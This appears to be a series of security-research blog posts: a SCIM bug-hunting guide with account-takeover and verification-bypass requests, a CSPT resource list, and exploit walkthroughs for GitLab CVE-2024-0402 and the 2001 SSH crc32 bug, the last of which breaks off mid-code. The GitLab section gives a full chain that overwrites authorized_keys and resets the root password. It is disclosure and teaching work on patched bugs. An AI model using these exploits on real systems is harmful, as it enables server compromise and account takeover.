Even if Oj defaults are overwritten (sorry, no deserialization) it could still be possible to put any data in the SCIM request and have it accessible through userData. The logic is assuming it will only contain SCIM attributes.

Verification Bypasses

This category contains all the bugs arising from required internal user-management processes not being applied to updates caused by SCIM events (e.g., email / phone / userName verification).

An interesting related finding is Gitlab Bypass Email Verification (CVE-2019-5473). We have found similar cases involving the bypass of a code verification processes during our assessments as well.

[*] Example - Same-Same But With Code Bypass

A SCIM email change did not trigger the typical confirmation flow requested with other email change operations.

Attackers could request a verification code to their email, change the email to a victim one with SCIM, then redeem the code and thus verify the new email address.

    PATCH /scim/v2/<ATTACKER_SAML_ORG_ID>/<ATTACKER_USER_SCIM_ID> HTTP/2
    Host: <CLIENT_PLATFORM>
    Authorization: Bearer <SCIM_TOKEN>
    Accept-Encoding: gzip, deflate, br
    Content-Type: application/json
    Content-Length: 205
    
    {
      "schemas": ["urn:ietf:params:scim:api:messages:2.0:PatchOp"],
      "Operations": [
        {
          "op": "replace",
          "value": {
            "userName": "<VICTIM_ADDRESS>"
        }
        }
      ]
    }

Account Takeover

In multi-tenant platforms, the SSO-SCIM identity should be linked to an underlying user object. While it is not part of the RFCs, the management of user attributes such as userName and email is required to eventually trigger the platform’s processes for validation and ownership checks.

A public example case where things did not go well while updating the underlying user is CVE-2022-1680 - Gitlab Account take over via SCIM email change. Below is a pretty similar instance discovered in one of our clients.

[*] Example - Same-Same But Different

A client permitted SCIM operations to change the email of the user and perform account takeover. The function set_username was called every time there was a creation or update of SCIM users.

        #[...]
        underlying_user = sso_user.underlying_user
        sso_user.scim["userName"] = new_name
        sso_user.username = new_name
        tenant = Tenant.find(sso_user.id)
        underlying_user&.change_email!(
          new_name,
          validate_email: tenant.isAuthzed?(new_name)
        )

        def underlying_user
            return nil if !tenant.isAuthzed?(self.username)
            # [...]
            #                                   (o)__(o)' 
            @underlying_user = User.find_by(email: self.username)
        end

The underlying_user should be nil, hence blocking the change, if the organization is not entitled to manage the user according to isAuthzed. In our specific case, the authorization function did not protect users in a specific state from being taken over. SCIM could be used to forcefully change the victim user’s email and take over the account once it was added to the tenant. If combined with the classic “Forced Tenant Join” issue, a nice chain could have been made.

Moreover, since the platform did not protect against multi-SSO context-switching, once authenticated with the new email, the attacker could have access to all other tenants the user was part of.

Extra Focus Areas

Interesting SCIM Ops Syntax

As per rfc7644, the Path attribute is defined as:

The “path” attribute value is a String containing an attribute path describing the target of the operation. The “path” attribute is OPTIONAL for “add” and “replace” and is REQUIRED for “remove” operations.

As the path attribute is OPTIONAL, the nil possibility should be carefully managed when it is part of the execution logic.

def exec_scim_ops(scim_identity, operation)
        path = operation["path"]
        value = operation["value"]

        case path
        when "members"
          # [...]
        when "externalId"
          # [...]
        else
          # semi-Catch-All Logic!
        end
      end

Putting a catch-all default could allow another syntax of PatchOp messages to still hit one of the restricted cases while skipping the checks. Here is an example SCIM request body that would skip the externalId checks and edit it within the context above.

{
  "schemas": ["urn:ietf:params:scim:api:messages:2.0:PatchOp"],
  "Operations": [
    {
      "op": "replace",
      "value": {
        "externalId": "<ID_INJECTION>"
        }
    }
  ]
}

The value of an op is allowed to contain a dict of <Attribute:Value>.

Bulk Ops Order Evaluation

Since bulk operations may be supported (currently very few cases), there could be specific issues arising in those implementations:

Race Conditions - the ordering logic could not include reasoning about the extra processes triggered in each step
Missing Circular References Protection - The RFC7644 is explicitly talking about Circular Reference Processing (see example below).

JSON Interoperability

Since SCIM adopts JSON for data representation, JSON interoperability attacks could lead to most of the issues described in the hunting list. A well-known starting point is the article: An Exploration of JSON Interoperability Vulnerabilities .

Once the parsing lib used in the SCIM implementation is discovered, check if other internal logic is relying on the stored JSON serialization while using a different parser for comparisons or unmarshaling.

Despite being a relatively simple format, JSON parser differentials could lead to interesting cases - such as the one below:

Conclusions

As an extension of SSO, SCIM has the potential to enable critical exploitations under specific circumstances. If you’re testing SSO, SCIM should be in scope too!

Finally, most of the interesting vulnerabilities in SCIM implementations require a deep understanding of the application’s authorization and authentication mechanisms. The real value lies in identifying the differences between SCIM objects and the mapped internal User objects, as these discrepancies often lead to impactful findings.

CSPT Resources

2025-03-27T00:00:00+01:00

As a follow up to Maxence Schmitt’s research on Client-Side Path Traversal (CSPT), we wanted to encourage researchers, bug hunters, and security professionals to explore CSPT further, as it remains an underrated yet impactful attack vector.

To support the community, we have compiled a list of blog posts, vulnerabilities, tools, CTF challenges, and videos related to CSPT. If anything is missing, let us know and we will update the post. Please note that the list is not ranked and does not reflect the quality or importance of the resources.

Publications (blog posts, advisories, …)

Maxence Schmitt: Exploiting Client-Side Path Traversal to Perform Cross-Site Request Forgery - Introducing CSPT2CSRF
Maxence Schmitt: CSPT & File Upload Bypasses
Dafydd Stuttard: PortSwigger - On-Site Request Forgery
Renwa: Client-Side Path Traversal (CSPT) Bug Bounty Reports and Techniques
Kapytein: From an Innocent Client-Side Path Traversal to Account Takeover
Mr. Medi: Practical Client-Side Path Traversal Attacks
Alvaro Balada: The Power of Client-Side Path Traversal: How I Found and Escalated 2 Bugs
Michelin CERT: Grafana CVE-2023-5123 Write-Up
Netragard: Saving CSRF: Client-Side Path Traversal to the Rescue
Sam Curry: CSPT2CSRF and CSPT->Open Redirect->XSS
Hussein Daher: CSPT->JSONP->XSS
Ron Masas: CSPT->XSS
Isira Adithya: CSPT->JSONP->XSS
Johan Carlsson: 1 Click CSPT->Stored id from a rogue Sentry server->PUT CSRF
Erasec: Client-Side Path Manipulation
Acut3: Fetch Diversion
Matan Berson: CSPT Levels
Facebook: Facebook Notes on CSPT
Vitor Falcão: Hacking High-Profile Bug Bounty Targets: Deep Dive into a Client-Side Chain

Videos

Maxence Schmitt: OWASP Lisbon 2024 - Exploiting Client-Side Path Traversal: CSRF Is Dead, Long Live CSRF
Maxence Schmitt: Volcamp 2024 - FR: Exploiting Client-Side Path Traversal: CSRF Is Dead, Long Live CSRF
Soheil Khodayari: OWASP Lisbon 2024 - Deep dive into CSPT techniques
Justin Gardner: Critical Thinking Podcast Channel
Grzegorz Niedziela: Bug Bounty Reports Explained Channel

Tools

Maxence Schmitt: CSPT Burp Extension
Dennis Goodlett: CSPT with Eval Villain
Kevin Mizu: DOMLoggerpp
PortSwigger: Burp Suite DOM Invader
Vitor Falcão: Automating CSPT Discovery

Challenges

Cryptocat: Intigriti Challenge 0824 - SafeNotes_2
- Write-up: SafeNotes_2 Write-up
Aleandro Prudenzano: European Cybersecurity Challenge 2024 CTF - Jeopardy - Web01)
- Write-up: European Cybersecurity Challenge 2024 CTF - Jeopardy - Web01

Labs

Maxence Schmitt: CSPT Playground

Thank you and good luck!

We hope this collection of resources will help the community to better understand and explore Client-Side Path Traversal (CSPT) vulnerabilities. We encourage anyone interested to take a deep dive into exploring CSPT techniques and possibilities and helping us to push the boundaries of web security. We wish you many exciting discoveries and plenty of CSPT-related bugs along the way!

More Information

This research project was made with ♡ by Maxence Schmitt, thanks to the 25% research time Doyensec gives its engineers. If you would like to learn more about our work, check out our blog, follow us on X, Mastodon, BlueSky or feel free to contact us at info@doyensec.com for more information on how we can help your organization “Build with Security”.

!exploitable Episode Three - Devfile Adventures

2025-03-18T00:00:00+01:00

Introduction

I know, we have written it multiple times now, but in case you are just tuning in, Doyensec had found themselves on a cruise ship touring the Mediterranean for our company retreat. To kill time between parties, we had some hacking sessions analyzing real-world vulnerabilities resulting in the !exploitable blogpost series.

In Part 1 we covered our journey into IoT ARM exploitation, while Part 2 followed our attempts to exploit the bug used by Trinity in The Matrix Reloaded movie.

For this episode, we will dive into the exploitation of CVE-2024-0402 in GitLab. Like an onion, there is always another layer beneath the surface of this bug, from YAML parser differentials to path traversal in decompression functions in order to achieve arbitrary file write in GitLab.

No public Proof Of Concept was published and making it turned out to be an adventure, deserving an extension of the original author’s blogpost with the PoC-related info to close the circle 😉

Some context

This vulnerability impacts the GitLab Workspaces functionality. To make a long story short, it lets developers instantly spin up integrated development environments (IDE) with all dependencies, tools, and configurations ready to go.

The whole Workspaces functionality relies on several components, including a running Kubernetes GitLab Agent and a devfile configuration.

Kubernetes GitLab Agent: The Kubernetes GitLab Agent connects GitLab to a Kubernetes cluster, allowing users to enable deployment process automations and making it easier to integrate GitLab CI/CD pipelines. It also allows Workspaces creation.

Devfile: It is an open standard defining containerized development environments. Let’s start by saying it is configured with YAML files used to define the tools, runtime, and dependencies needed for a certain project.

Example of a devfile configuration (to be placed in the GitLab repository as .devfile.yaml):

apiVersion: 1.0.0
metadata:
  name: my-app
components:
  - name: runtime
    container:
      image: registry.access.redhat.com/ubi8/nodejs-14
      endpoints:
        - name: http
          targetPort: 3000

The bug

Let’s start with the publicly available information enriched with extra code-context.

GitLab was using the devfile Gem (Ruby of course) making calls to the external devfile binary (written in Go) in order to process the .devfile.yaml files during Workspace creation in a specific repository.

During the devfile pre-processing routine applied by Workspaces, a specific validator named validate_parent was called by PreFlattenDevfileValidator in GitLab.

# gitlab-v16.8.0-ee/ee/lib/remote_development/workspaces/create/pre_flatten_devfile_validator.rb:50
...
        def self.validate_parent(value)
          value => { devfile: Hash => devfile }
          return err(_("Inheriting from 'parent' is not yet supported")) if devfile['parent']
          Result.ok(value)
        end
...

But what is the parent option? As per the Devfile documentation:

If you designate a parent devfile, the given devfile inherits all its behavior from its parent. Still, you can use the child devfile to override certain content from the parent devfile.

Then, it proceeds to describe three types of parent references:

Parent referred by registry - remote devfile registry
Parent referred by URI - static HTTP server
Parent identified by a Kubernetes resource - available namespace

As with any other remote fetching functionality, it would be worth reviewing to find bugs. But at first glance the option seems to be blocked by validate_parent.

YAML parser differentials for the win

As widely known, even the most used implementations of specific standards may have minor deviations from what was defined in the specification. In this specific case, a YAML parser differential between Ruby and Go was needed.

The author blessed us with a new trick for our differentials notes. In the YAML Spec:

The single exclamation mark ! is used for custom or application-specific data types
```
my_custom_data: !MyType "some value"
```
The double exclamation mark !! is used for built-in YAML types
```
bool_value: !!bool "true"
```

He found out that the local YAML tags notation ! (RFC reference) is still activating the binary format base64 decoding in the Ruby yaml lib, while the Go gopkg.in/yaml.v3 is just dropping it, leading to the following behavior:

➜ cat test3.yaml
normalk: just a value
!binary parent: got injected

### valid parent option added in the parsed version (!binary dropped)
➜ go run g.go test3.yaml
parent: got injected
normalk: just a value

### invalid parent option as Base64 decoded value (!binary evaluated)
➜ ruby -ryaml -e 'x = YAML.safe_load(File.read("test3.yaml"));puts x'
{"normalk"=>"just a value", "\xA5\xAA\xDE\x9E"=>"got injected"}

Consequently, it was possible to pass GitLab a devfile with a parent option through validate_parent function and reach the devfile binary execution with it.

The arbitrary file write

At this point, we need to switch to a bug discovered in the devfile binary (Go implementation).
After looking into a dependency of a dependency of a dependency, the hunter got his hands on the decompress function. This was taking tar.gz archives from the registry’s library and extracting the files inside the GitLab server. Later, it should then move them into the deployed Workspace environment.

Here is the vulnerable decompression function used by getResourcesFromRegistry:

// decompress extracts the archive file
func decompress(targetDir string, tarFile string, excludeFiles []string) error {
    var returnedErr error

    reader, err := os.Open(filepath.Clean(tarFile))
    ...
    gzReader, err := gzip.NewReader(reader)
    ...
    tarReader := tar.NewReader(gzReader)
    for {
        header, err := tarReader.Next()
        ...
        target := path.Join(targetDir, filepath.Clean(header.Name))
        switch header.Typeflag {
        ...
        case tar.TypeReg:
            /* #nosec G304 -- target is produced using path.Join which cleans the dir path */
            w, err := os.OpenFile(target, os.O_CREATE|os.O_RDWR, os.FileMode(header.Mode))
            if err != nil {
                returnedErr = multierror.Append(returnedErr, err)
                return returnedErr
            }
            /* #nosec G110 -- starter projects are vetted before they are added to a registry.  Their contents can be seen before they are downloaded */
            _, err = io.Copy(w, tarReader)
            if err != nil {
                returnedErr = multierror.Append(returnedErr, err)
                return returnedErr
            }
            err = w.Close()
            if err != nil {
                returnedErr = multierror.Append(returnedErr, err)
                return returnedErr
            }
        default:
            log.Printf("Unsupported type: %v", header.Typeflag)
        }
    }
    return nil
}

The function opens tarFile and iterates through its contents with tarReader.Next(). Only contents of type tar.TypeDir and tar.TypeReg are processed, preventing symlink and other nested exploitations.

Nevertheless, the line target := path.Join(targetDir, filepath.Clean(header.Name)) is vulnerable to path traversal for the following reasons:

header.Name comes from a remote tar archive served by the devfile registry
filepath.Clean is known for not preventing path traversals on relative paths (../ is not removed)

The resulting execution will be something like:

fmt.Println(filepath.Clean("/../../../../../../../tmp/test")) // absolute path
fmt.Println(filepath.Clean("../../../../../../../tmp/test"))  // relative path

//prints

/tmp/test
../../../../../../../tmp/test

There are plenty of scripts to create a valid PoC for an evil archive exploiting such directory traversal pattern (e.g., evilarc.py).

Linking the pieces

A decompression issue in the devfile lib fetching files from a remote registry allowed a devfile registry containing a malicious .tar archive to write arbitrary files within the devfile client system
In GitLab, a developer could craft a bad-yet-valid .devfile.yaml definition including the parent option that will force the GitLab server to use the malicious registry, hence triggering the arbitrary file write on the server itself

The requirements to exploit this vuln are:

Access to the targeted GitLab as a developer capable of committing code to a repository
Workspace functionality configured properly on the GitLab instance (v16.8.0 and below)

Let’s exploit it!

Configuring the environment

To ensure you have the full picture, I must tell you what it’s like to configure Workspaces in GitLab, with slow internet while being on a cruise 🌊 - an absolute nightmare!

Of course, there are the docs on how to do so, but today you will be blessed with some extra finds:

Follow the GitLab 16.8 documentation page, NOT the latest one since it changed. Do not be like us, wasting fun time in the middle of the sea.
The feature changed so much, they even removed the container images required by GitLab 16.8. So, you need to patch the missing web-ide-injector container image.
```
ubuntu@gitlabServer16.8:~$ find / -name "editor_component_injector.rb" 2>/dev/null
/opt/gitlab/embedded/service/gitlab-rails/ee/lib/remote_development/workspaces/create/editor_component_injector.rb
```
Replace the value at line 129 of the web-ide-injector image with: registry.gitlab.com/gitlab-org/gitlab-web-ide-vscode-fork/gitlab-vscode-build:latest

The GitLab Agent must have the remote_development option to allow Workspaces.
Here is a valid config.yaml file for it

remote_development:
  enabled: true
  dns_zone: "workspaces.gitlab.yourdomain.com"
observability:
logging:
  level: debug
  grpc_level: warn

May the force be with you while configuring it.

Time to craft

As previously stated, this bug chain is layered like an onion. Here is a classic 2025 AI generated image sketching it for us:

The publicly available information left us with the following tasks if we wanted to exploit it:

Deploy a custom devfile registry, which turned out to be easy following the original repository
Make it malicious by including the .tar file packed with our path traversal to overwrite something in the GitLab instance
Add a .devfile.yaml pointing to it in a target GitLab repository

In order to find out where the malicious.tar belonged, we had to take a step back and read some more code. In particular, we had to understand the context in which the vulnerable decompress function was being called.

We ended up reading PullStackByMediaTypesFromRegistry, a function used to pull a specified stack with allowed media types from a given registry URL to some destination directory.

See at library.go:293

func PullStackByMediaTypesFromRegistry(registry string, stack string, allowedMediaTypes []string, destDir string, options RegistryOptions) error {
	//...
	//Logic to Pull a stack from registry and save it to disk
	//...

	// Decompress archive.tar
	archivePath := filepath.Join(destDir, "archive.tar")
	if _, err := os.Stat(archivePath); err == nil {
		err := decompress(destDir, archivePath, ExcludedFiles)
		if err != nil {
			return err
		}
		err = os.RemoveAll(archivePath)
		if err != nil {
			return err
		}
	}
	return nil
}

The code pattern highlighted that devfile registry stacks were involved and that they included some archive.tar file in their structure.

Why should a devfile stack contain a tar?

An archive.tar file may be included in the package to distribute starter projects or pre-configured application templates. It helps developers quickly set up their workspace with example code, configurations, and dependencies.

A few quick GitHub searches in the devfile registry building process revealed that our target .tar file should be placed within the registry project under stacks/<STACK_NAME>/<STACK_VERSION>/archive.tar in the same directory containing the devfile.yaml for the specific version being deployed.

As a result, the destination for the path-traversal tar in our custom registry is:

malicious-registry/stacks/nodejs/2.2.1/archive.tar

Building & running the malicious devfile registry

It required some extra work to build our custom registry (couldn’t make the building scripts work, had to edit them), but we eventually managed to place our archive.tar (e.g., created using evilarc.py) in the right spot and craft a proper index.json to serve it. The final reusable structure can be found in our PoC repository, so save yourself some time to build the devfile registry image.

Commands to run the malicious registry:

docker run -d -p 5000:5000 --name local-registrypoc registry:2 to serve a local container registry that will be used by the devfile registry to store the actual stack (see yellow highlight)
docker run --network host devfile-index to run the malicious devfile registry built with the official repository. Find it in our PoC repository

Pull the trigger 💥

Once you have a running registry reachable by the target GitLab instance, you just have to authenticate in GitLab as developer and edit the .devfile.yaml of a repository to point it by exploiting the YAML parser differential shown before.
Here is an example you can use:

schemaVersion: 2.2.0
!binary parent:
    id: nodejs
    registryUrl: http://<YOUR_MALICIOUS_REGISTRY>:<PORT>
components:
  - name: development-environment
    attributes:
      gl/inject-editor: true
    container:
      image: "registry.gitlab.com/gitlab-org/gitlab-build-images/workspaces/ubuntu-24.04:20250109224147-golang-1.23@sha256:c3d5527641bc0c6f4fbbea4bb36fe225b8e9f1df69f682c927941327312bc676"

To trigger the file-write, just start a new Workspace in the edited repo and wait.

Nice! We have successfully written Hello CVE-2024-0402! in /tmp/plsWorkItsPartyTime.txt.

Where to go now…

We got the write, but we couldn’t stop there, so we investigated some reliable ways to escalate it.
First things first, we checked the system user performing the file write using a session on the GitLab server.

/tmp$ ls -lah /tmp/plsWorkItsPartyTime.txt
-rw-rw-r-- 1 git git 21 Mar 10 15:13 /tmp/plsWorkItsPartyTime.txt

Apparently, our go-to user is git, a pretty important user in the GitLab internals. After inspecting writeable files for a quick win, we found out it seemed hardened without tons of editable config files, as expected.

...
/var/opt/gitlab/gitlab-exporter/gitlab-exporter.yml
/var/opt/gitlab/.gitconfig
/var/opt/gitlab/.ssh/authorized_keys
/opt/gitlab/embedded/service/gitlab-rails/db/main_clusterwide.sql
/opt/gitlab/embedded/service/gitlab-rails/db/ci_structure.sql
/var/opt/gitlab/git-data/repositories/.gitaly-metadata
...

Some interesting files were waiting to be overwritten, but you may have noticed the quickest yet not honorable entry: /var/opt/gitlab/.ssh/authorized_keys.

Notably, you can add an SSH key to your GitLab account and then use it to SSH as git to perform code-related operations. The authorized_keys file is managed by the GitLab Shell, which adds the SSH Keys from the user profile and forces them into a restricted shell to further manage/restrict the user access-level.

Here is an example line added to the authorized keys when you add your profile SSH key in GitLab:

command="/opt/gitlab/embedded/service/gitlab-shell/bin/gitlab-shell key-1",no-port-forwarding,no-X11-forwarding,no-agent-forwarding,no-pty ssh-ed25519 AAAAC3...[REDACTED]

Since we got arbitrary file write, we can just substitute the authorized_keys with one containing a non-restricted key we can use. Back to our exploit prepping, create a new .tar ad-hoc for it:

## write a valid entry in a local authorized_keys for one of your keys
➜ python3 evilarc.py authorized_keys -f archive.tar.gz -p var/opt/gitlab/.ssh/ -o unix

At this point, substitute the archive.tar in your malicious devfile registry, rebuild its image and run it. When ready, trigger the exploit again by creating a new Workspace in the GitLab Web UI.

After a few seconds, you should be able to SSH as an unrestricted git user. Below we also show how to change the GitLab Web root user’s password:

➜ ssh  -i ~/.ssh/gitlab2 git@gitinstance.local
➜ git@gitinstance.local:~$ gitlab-rails console --environment production
--------------------------------------------------------------------------------
 Ruby:         ruby 3.1.4p223 (2023-03-30 revision 957bb7cb81) [x86_64-linux]
 GitLab:       16.8.0-ee (1e912d57d5a) EE
 GitLab Shell: 14.32.0
 PostgreSQL:   14.9
------------------------------------------------------------[ booted in 39.28s ]

Loading production environment (Rails 7.0.8)
irb(main):002:0> user = User.find_by_username 'root'
=> #<User id:1 @root>
irb(main):003:0> new_password = 'ItIsPartyTime!'
=> "ItIsPartyTime!"
irb(main):004:0> user.password = new_password
=> "ItIsPartyTime!"
irb(main):005:0> user.password_confirmation = new_password
=> "ItIsPartyTime!"
irb(main):006:0> user.password_automatically_set = false
irb(main):007:0> user.save!
=> true

Finally, you are ready to authenticate as the root user in the target Web instance.

Conclusion

Our goal was to build a PoC for CVE-2024-0402. We were able to do it despite the restricted time and connectivity. Still, there were tons of configuration errors while preparing the GitLab Workspaces environment, we almost surrendered because the feature itself was just not working after hours of setup. Once again, that demonstrates how very good bugs can be found in places where just a few people adventure because of config time constraints.

Shout out to joernchen for the discovery of the chain. Not only was the bug great, but he also did an amazing work in describing the research path he followed in this article. We had fun exploiting it and we hope people will save time with our public exploit!

Resources

!exploitable Episode Two - Enter the Matrix

2025-02-27T00:00:00+01:00

Introduction

In case you are just tuning in, Doyensec has found themselves on a cruse ship touring the Mediterranean. Unwinding, hanging out with colleagues and having some fun. Part 1 covered our journey into IoT ARM exploitation, while our next blog post, coming in the next couple weeks, will cover a web target. For this episode, we attempt to exploit one of the most famous vulnerabilities ever. SSHNuke from back in 2001. Better known as the exploit used by Trinity in the movie The Matrix Reloaded.

Some Quick History

Back in 1998 Ariel Futoransky and Emiliano Kargieman realized SSH’s protocol was fundamentally flawed, as it was possible to inject cipher text. So a crc32 checksum was added in order to detect this attack.

On February 8, 2001 Michal Zalewski posted to the Bugtraq mailing list an advisory named “Remote vulnerability in SSH daemon crc32 compensation attack detector” labeled CAN-2001-0144 (CAN aka CVE candidate) (ref). The “crc32” had a unique memory corruption vulnerability that could result in arbitrary code execution.

A bit after June, TESO Security released a statement regarding the leak of an exploit they wrote. This is interesting as it demonstrates that until June there was no reliable public exploit. TESO was aware of 6, private exploits, including their own.

Keep in mind, the first major OS level mitigation to memory corruption was not released until July of that year in the form of ALSR. A lack of exploits is likely due to the novelty of this vulnerability.

The Matrix Reloaded started filming March of 2001 and was released May of 2003. It’s impressive they picked such an amazing bug for the movie from one of the most well-known hackers of our day.

Trying it yourself

Building exploit environments is at best boring. At sea, with no Internet, trying to build a 20 year old piece of software is a nightmare. So while some of our team worked on that, we ported the vulnerability to a standalone main.c that anyone can easily build on any modern (or even old) system.

Feel free to grab it from github, compile with gcc -g main.c and follow along.

The Bug

This is your last chance to try and find the bug yourself. The core of the bug is in the following source code.

From: src/deattack.c:82 - 109

/* Detect a crc32 compensation attack on a packet */
int
detect_attack(unsigned char *buf, u_int32_t len, unsigned char *IV)
{
	static u_int16_t *h = (u_int16_t *) NULL;
	static u_int16_t n = HASH_MINSIZE / HASH_ENTRYSIZE; // DOYEN 0x1000
	register u_int32_t i, j;
	u_int32_t l;
	register unsigned char *c;
	unsigned char *d;

	if (len > (SSH_MAXBLOCKS * SSH_BLOCKSIZE) || // DOYEN len > 0x40000
	    len % SSH_BLOCKSIZE != 0) {              // DOYEN len % 8
		fatal("detect_attack: bad length %d", len);
	}
	for (l = n; l < HASH_FACTOR(len / SSH_BLOCKSIZE); l = l << 2)
		;

	if (h == NULL) {
		debug("Installing crc compensation attack detector.");
		n = l;
		h = (u_int16_t *) xmalloc(n * HASH_ENTRYSIZE);
	} else {
		if (l > n) {
			n = l;
			h = (u_int16_t *) xrealloc(h, n * HASH_ENTRYSIZE);
		}
	}

This code is making sure the h buffer and its size n are managed properly. This code is crucial, as it runs every encrypted message. To prevent re-allocation, h and n are declared static. The xmalloc will initialize h with memory on the first call. Subsequent calls test if len is too big for n to handle - if so, a xrealloc occurs.

Have you discovered the bug? My first thought was an int overflow in xmalloc(n * HASH_ENTRYSIZE) or its twin xrealloc(h, n * HASH_ENTRYSIZE). This is wrong! These values can not be overflowed because of restrictions on n. These restrictions though, end up being the real vulnerability. I am curious if Zalewski took this path as well.

The variable n is declared early on (C99 spec) as a 16 bit value (static u_int16_t), while l is 32 bit (u_int32_t). So a potential int overflow occurs on n = l if l is greater than 0xffff. Can we get l big enough to overflow?

	for (l = n; l < HASH_FACTOR(len / SSH_BLOCKSIZE); l = l << 2)
		;

This cryptic line is our only chance to set l. It initially sets l to n. Remember n represents our static size of h. So l is acting like a temp variable to see if n needs adjustment. Every time this for loop runs, l is bit shifted left by 2 (l << 2). This effectively multiplies l by 4 every iteration. We know l is initially 0x1000, so after a single loop it will be 0x4000. Another loop and it’s 0x10000. This 0x10000 value cast to a u_int16_t will overflow and result in 0. So all possible values of n are 0x1000, 0x4000 and 0. Any further iterations of the above loop will bitshift 0 to 0.

The loop runs when l < HASH_FACTOR(len / SSH_BLOCKSIZE). The HASH_FACTOR macro is just multiplying len by 3/2. So a bit of math lets us know that len needs to be 0x15560 or more, to loop twice. We can validate this with our main.c by adding the following code (or use the cheat branch of git repo).

int main() {
	size_t len = 0x15560; 

	unsigned char *buf = malloc (len);
	memset(buf, 'A', len);

    // call to vulnerable function
	int i = detect_attack(buf, len, NULL);
	free (buf);

	printf("returned %d\n", i);
	return 0;
}

Then debug it on our Mac using lldbg.

$ gcc -g main.c
$  lldb ./a.out
(lldb) target create "./a.out"
Current executable set to 'a.out' (arm64).
(lldb) source list -n detect_attack
File: main.c
...
   165  int
   166  detect_attack(unsigned char *buf, u_int32_t len, unsigned char *IV)
   167  {
   168          static u_int16_t *h = (u_int16_t *) NULL;
   169          static u_int16_t n = HASH_MINSIZE / HASH_ENTRYSIZE;
   170          register u_int32_t i, j;
   171          u_int32_t l;
(lldb)
   172          register unsigned char *c;
   173          unsigned char *d;
   174
   175          if (len > (SSH_MAXBLOCKS * SSH_BLOCKSIZE) ||
   176              len % SSH_BLOCKSIZE != 0) {
   177                  fatal("detect_attack: bad length %d", len);
   178          }
   179          for (l = n; l < HASH_FACTOR(len / SSH_BLOCKSIZE); l = l << 2)
   180                  ;
   181
   182          if (h == NULL) {
(lldb)
(lldb) b 182
Breakpoint 1: where = a.out`detect_attack + 200 at main.c:182:6, address = 0x0000000100003954
(lldb) r
Process 7691 launched: 'a.out' (arm64)
Process 7691 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = breakpoint 1.1
    frame #0: 0x0000000100003954 a.out`detect_attack(buf="AAAAAAAAAAAAAAAAAAAAAA....
   179          for (l = n; l < HASH_FACTOR(len / SSH_BLOCKSIZE); l = l << 2)
   180                  ;
   181
-> 182          if (h == NULL) {
   183                  debug("Installing crc compensation attack detector.");
   184                  n = l;
   185                  h = (u_int16_t *) xmalloc(n * HASH_ENTRYSIZE);
Target 0: (a.out) stopped.
(lldb) p/x l
(u_int32_t) 0x00010000
(lldb) p/x l & 0xffff
(u_int32_t) 0x00000000
(lldb) n
Process 7691 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = step over
    frame #0: 0x0000000100003970 a.out`detect_attack(buf="AAAAAAAAAAAAAAAAAAAAAAAAA...
   180                  ;
   181
   182          if (h == NULL) {
-> 183                  debug("Installing crc compensation attack detector.");
   184                  n = l;
   185                  h = (u_int16_t *) xmalloc(n * HASH_ENTRYSIZE);
   186          } else {
Target 0: (a.out) stopped.
(lldb) n
Process 7691 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = step over
    frame #0: 0x0000000100003974 a.out`detect_attack(buf="AAAAAAAAAAAAAAAAAAAAAAAAAAA...
   181
   182          if (h == NULL) {
   183                  debug("Installing crc compensation attack detector.");
-> 184                  n = l;
   185                  h = (u_int16_t *) xmalloc(n * HASH_ENTRYSIZE);
   186          } else {
   187                  if (l > n) {
Target 0: (a.out) stopped.
(lldb) n
Process 7691 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = step over
    frame #0: 0x0000000100003980 a.out`detect_attack(buf="AAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
   182          if (h == NULL) {
   183                  debug("Installing crc compensation attack detector.");
   184                  n = l;
-> 185                  h = (u_int16_t *) xmalloc(n * HASH_ENTRYSIZE);
   186          } else {
   187                  if (l > n) {
   188                          n = l;
Target 0: (a.out) stopped.
(lldb) p/x n
(u_int16_t) 0x0000

The last line above shows that n is 0 just after n = l. The reason this is important quickly becomes apparent if we continue the code.

(lldb) c
Process 7691 resuming
Process 7691 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0x600082d68282)
    frame #0: 0x0000000100003c78 a.out`detect_attack(buf="AAAAA...
   215                  h[HASH(IV) & (n - 1)] = HASH_IV;
   216
   217          for (c = buf, j = 0; c < (buf + len); c += SSH_BLOCKSIZE, j++) {
-> 218                  for (i = HASH(c) & (n - 1); h[i] != HASH_UNUSED;
   219                       i = (i + 1) & (n - 1)) {
   220                          if (h[i] == HASH_IV) {
   221                                  if (!CMP(c, IV)) {
Target 0: (a.out) stopped.
(lldb) p/x i
(u_int32_t) 0x41414141
(lldb) p/x h[i]
error: Couldn't apply expression side effects : Couldn't dematerialize a result variable: couldn't read its memory

We got a crash showing our injected As as 0x41414141.

Just as we pass some nice islands.

The crash

The crash occurs because the check h[0x41414141] != HASH_UNUSED ([0] below) hit invalid memory.

From: src/deattack.c:135 - 153

	for (c = buf, j = 0; c < (buf + len); c += SSH_BLOCKSIZE, j++) {
		for (i = HASH(c) & (n - 1); h[i] /*<- [0]*/ != HASH_UNUSED;
		     i = (i + 1) & (n - 1)) {
			if (h[i] == HASH_IV) {
				if (!CMP(c, IV)) {
					if (check_crc(c, buf, len, IV))
						return (DEATTACK_DETECTED);
					else
						break;
				}
			} else if (!CMP(c, buf + h[i] * SSH_BLOCKSIZE)) {
				if (check_crc(c, buf, len, IV))
					return (DEATTACK_DETECTED);
				else
					break;
			}
		}
		h[i] = j; // [1] arbitrary write!!!
	}

What if h[i] was a readable offset? After some checks we would hit [1] where h[i] = j. Notice j is the number of iterations in the loop, we can control that with our buffer length. The i is our 0x41414141, we can control that. So we end up with a write-what-where primitive in a loop.

Crashing the real thing!

At this point we had a working OpenSSH server nicely set up. We need to send our buffer through SSH protocol 1. We couldn’t find an SSH python client that worked with such an outdated broken protocol. The intended solution was to patch out the OpenSSH crypto stuff to make it an easy socket connection. Instead we patched the OpenSSH client that came with the source code. It seems that the real exploit authors might have taken a similar approach.

Finding the patch location was easy with a little trick. Use gdb to break on the vulnerable detect_attack in the SSH server application. Then use gdb to debug the client connecting to the server. The server hangs on the breakpoint, causing the client to hang, waiting on a response to a packet. Ctrl+C in the client and we are at the response handler for the first vulnerable packet sent to the server. As a result we made the following patch.

From: sshconnect1.c:873 - 890

	{
		// DOYENSEC
		// Builds a packet to exploit server
		packet_start(SSH_MSG_IGNORE); // Should do nothing
		int dsize = 0x15560 - 0x10; // -0x10 b/c they add crc for us
		char *buf = malloc (dsize);
